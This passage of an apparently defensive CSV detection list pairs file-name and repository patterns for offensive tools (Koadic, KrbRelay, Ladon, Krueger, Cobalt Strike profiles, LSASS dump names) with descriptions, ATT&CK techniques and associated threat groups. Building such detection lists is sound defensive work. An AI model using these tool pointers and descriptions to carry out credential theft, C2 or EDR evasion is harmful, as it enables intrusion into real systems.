BEAR","C2","https://github.com/zerosum0x0/koadic","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8389" "*/koadic.git*",".{0,1000}\/koadic\.git.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8390" "*/Koppeling.git*",".{0,1000}\/Koppeling\.git.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","8391" "*/kost/revsocks/releases*",".{0,1000}\/kost\/revsocks\/releases.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","8392" "*/KrakenMask.git*",".{0,1000}\/KrakenMask\.git.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","N/A","9","3","N/A","N/A","N/A","N/A","8393" "*/krb5/*.py",".{0,1000}\/krb5\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8394" "*/krb5-enum-users.nse*",".{0,1000}\/krb5\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8395" "*/krbjack.git*",".{0,1000}\/krbjack\.git.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","8396" "*/KrbRelay*",".{0,1000}\/KrbRelay.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","8397" "*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8398" 
"*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","8399" "*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","8400" "*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8401" "*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8402" "*/KrbRelay-SMBServer.git*",".{0,1000}\/KrbRelay\-SMBServer\.git.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","8403" "*/KrbRelay-SMBServer/releases/*",".{0,1000}\/KrbRelay\-SMBServer\/releases\/.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","8404" "*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Black
Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8405" "*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","8406" "*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8407" "*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8408" "*/KrbRelayUp.git*",".{0,1000}\/KrbRelayUp\.git.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","8409" "*/krbrelayx*",".{0,1000}\/krbrelayx.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","8410" "*/KRBUACBypass*",".{0,1000}\/KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","8411" "*/KRBUACBypass.git*",".{0,1000}\/KRBUACBypass\.git.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","8412" "*/kronos.profile*",".{0,1000}\/kronos\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","8413" "*/Krueger.exe*",".{0,1000}\/Krueger\.exe.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - 
T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","1","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","8414" "*/Krueger.git*",".{0,1000}\/Krueger\.git.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","1","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","8415" "*/kubesploit.git*",".{0,1000}\/kubesploit\.git.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","8416" "*/Kubestroyer.git*",".{0,1000}\/Kubestroyer\.git.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","8417" "*/L0ading-x/cve-2022-23131*",".{0,1000}\/L0ading\-x\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/L0ading-x/cve-2022-23131","1","1","N/A","N/A","N/A","1","29","12","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z","8418"
"*/label-date-lsass.dmp*",".{0,1000}\/label\-date\-lsass\.dmp.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#content","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","8419" "*/laconicwolf/burp-extensions*",".{0,1000}\/laconicwolf\/burp\-extensions.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","8420" "*/Ladon.exe*",".{0,1000}\/Ladon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8421" "*/Ladon.go*",".{0,1000}\/Ladon\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8422" "*/Ladon.ps1*",".{0,1000}\/Ladon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8423" "*/Ladon.py*",".{0,1000}\/Ladon\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8424" "*/Ladon/Ladon.*",".{0,1000}\/Ladon\/Ladon\..{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8425" "*/Ladon/obj/x86*",".{0,1000}\/Ladon\/obj\/x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8426" "*/Ladon1.exe*",".{0,1000}\/Ladon1\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - 